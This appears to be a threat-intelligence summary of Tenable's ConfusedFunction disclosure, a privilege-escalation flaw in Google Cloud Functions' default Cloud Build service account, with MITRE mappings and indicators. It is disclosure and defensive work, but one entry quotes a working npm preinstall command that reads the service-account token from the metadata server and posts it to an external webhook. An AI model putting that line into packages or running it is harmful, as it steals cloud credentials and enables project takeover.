Tenable Research uncovered ConfusedFunction, a privilege-escalation vulnerability in Google Cloud Functions tied to the deployment process attaching a default Cloud Build service account with excessive permissions. Google Cloud remediated some aspects for new deployments, but existing legacy Cloud Build accounts remain vulnerable and require least-privilege replacements and ongoing monitoring. #ConfusedFunction #CloudFunctions #CloudBuild #GoogleCloudPlatform
Keypoints
- ConfusedFunction is a privilege-escalation vulnerability in Google Cloud Platform’s Cloud Functions tied to the deployment process attaching a default Cloud Build service account with excessive permissions.
- An attacker who can create or update a Cloud Function can escalate to the default Cloud Build service account, gaining high privileges within the project.
- The elevated privileges can be leveraged in other GCP services created during function deployment (e.g., Cloud Storage, Artifact Registry, Container Registry).
- Google Cloud remediated the issue for Cloud Build accounts created after mid-June 2024, but existing legacy Cloud Build instances remain vulnerable; organizations must replace them with least-privilege accounts.
- The vulnerability underscores risks from cloud service interdependencies and IAM complexity in serverless deployments, especially when automated processes create background services.
- Tenable demonstrates a PoC where malicious dependencies in Node.js package.json can exfiltrate the default Cloud Build service account token from instance metadata, enabling privilege escalation.
- Google Cloud and Tenable outline remediation steps and future security enhancements, including custom service accounts for Cloud Build and organization policies to control defaults.
MITRE Techniques
- [T1068] Exploitation for Privilege Escalation – The attacker escalates to the default Cloud Build service account during Cloud Function deployment. “The attacker could leverage the high privileges of the default Cloud Build service account in other GCP services that are created when a Cloud Function is created or updated, including Cloud Storage, and Artifact Registry or Container Registry.”
- [T1078] Valid Accounts – An attacker uses the deployment process to escalate privileges to a pre-existing, privileged service account. “An attacker who gains access to create or update a Cloud Function can take advantage of the function’s deployment process to escalate privileges to the default Cloud Build service account.”
- [T1041] Exfiltration – The attacker exfiltrates tokens from the Cloud Build metadata to an external endpoint. “preinstall script… will exfiltrate the GCP token of the default Cloud Build service account from the metadata of the Cloud Build instance to your webhook.”
- [T1552.003] Cloud Credentials – Token-based access within cloud metadata is obtained and used to impersonate cloud identities. “This code will then extract the default Cloud Build service account token… from the metadata of the Cloud Build instance.”
- [T1195] Software Supply Chain – The attack demonstrates injecting a malicious dependency into the function’s dependencies, impacting the deployment. “The deployment process will start, and the Cloud Build will run, including the ‘npm install’ command that will install our malicious dependency.”
- [T1059.004] Command and Scripting Interpreter – The attack relies on preinstall scripts executed during npm install to run malicious commands. “preinstall”: “access_token=$(curl -H ‘Metadata-Flavor: Google’ ‘http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/…/token’);curl -X POST -d $access_token https://tenable-webhook.com”
Indicators of Compromise
- [Domain] Internal/External domains used in the attack – metadata.google.internal, tenable-webhook.com
- [URL] Endpoints involved in credential access and exfiltration – http://metadata.google.internal/computeMetadata/v1/instance/service-accounts//token, https://tenable-webhook.com
- [File] Key payloads and artifacts referenced in the PoC – package.json, shell.sh, index.js